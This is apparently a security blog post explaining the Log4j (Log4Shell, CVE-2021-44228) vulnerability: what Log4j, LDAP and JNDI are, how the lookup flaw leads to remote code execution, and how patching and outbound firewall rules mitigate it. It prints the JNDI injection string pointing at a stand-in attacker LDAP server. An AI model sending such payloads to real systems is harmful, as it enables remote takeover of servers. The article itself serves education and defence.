Log4j Vulnerability Explanation In Details | CyberNcrypt

In this article, we will discuss one of the latest serious zero-day vulnerabilities, the log4j vulnerability.

Contents included

1. What is Apache Log4j?

2. What is Log4j vulnerability?

3. How to exploit Log4j Vulnerability?

4. Mitigation

What is Apache Log4j

Simply Apache Log4j is a Java-based logging utility. Log4j is an open-source logging framework that enables software developers to record a variety of data inside an application. It is a component of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is used by tens of thousands of websites and apps to record information that may be utilized for debugging or other reasons.

What is Log4j vulnerability?

Chen Zhaojun of the Alibaba Cloud Security Team discovered the serious Log4j vulnerability, which affects Apache Log4j 2 versions 2.0 to 2.14.1. On 10 December 2021, NIST disclosed a serious CVE in the National Vulnerability Database, designating it CVE-2021–44228. The Apache Software Foundation has awarded the highest CVSS severity rating of 10 to the vulnerability.

The vulnerability permits remote code execution without authentication. It may be exploited by simply inserting a line of code like ${jndi:ldap://[attacker_URL]}. This flaw is present in products from some of the most prominent technology providers, including AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare. This blog provides specific information on this vulnerability.

How to exploit Log4j Vulnerability

Before learning how to exploit this, we must get familiar with LDAP and JNDI.

What is LDAP

LDAP is an open standard application protocol for gaining access to and managing distributed directory information services (shown in the diagram). Suppose, for instance, that you register for a business program using your login and password. Now LDAP is here to save your information in user accounts, and whenever you log in to an application, the program sends a request to LDAP, and if your username and password are accurate, LDAP returns your username from the user accounts, as seen in the diagrams.

What is JNDI

The Java Naming and Directory Interface (JNDI) offers an application programming interface (API) for LDAP interaction. Simply said, a Java application cannot send requests directly to LDAP; hence, JNDI is required to interface with LDAP.

How you can exploit the Log4j vulnerability

Log4j allows logged messages to contain format strings that reference external information through the Java Naming and Directory Interface (JNDI). This allows information to be remotely retrieved across a variety of protocols, including the Lightweight Directory Access Protocol (LDAP). {For better understanding take a look at the given diagram}

Typically, the contents of log messages include user-controlled data. As a result, attackers may introduce JNDI references leading to LDAP servers they control, ready to serve malicious Java classes that do whatever activity they choose.

When Log4j finds the following string in a log message: ${jndi:ldap://attackerserver/exploit}, It informs the JNDI to request the “exploit” object from the LDAP server on the “attacker server.” JNDI is designed to run Java classes referenced by an LDAP server.

If the LDAP server’s answer contains the URL https://attackerserver/exploit, JNDI will automatically request and execute the file “exploit” from the web server.{For Better understanding have a glance at the diagram }

Mitigation

• The vendor has provided a patch, and users are urged to upgrade Log4j to version 2.17.0 if feasible.
• Using outbound firewall rules on servers to deter attackers is an effective mitigating approach. If the server can do DNS lookups and an attacker scans for susceptible instances of log4j2, the DNS lookup will be triggered. A firewall may stop the outbound connections of an actual attack and give some level of protection, despite the fact that attackers can readily circumvent firewalls.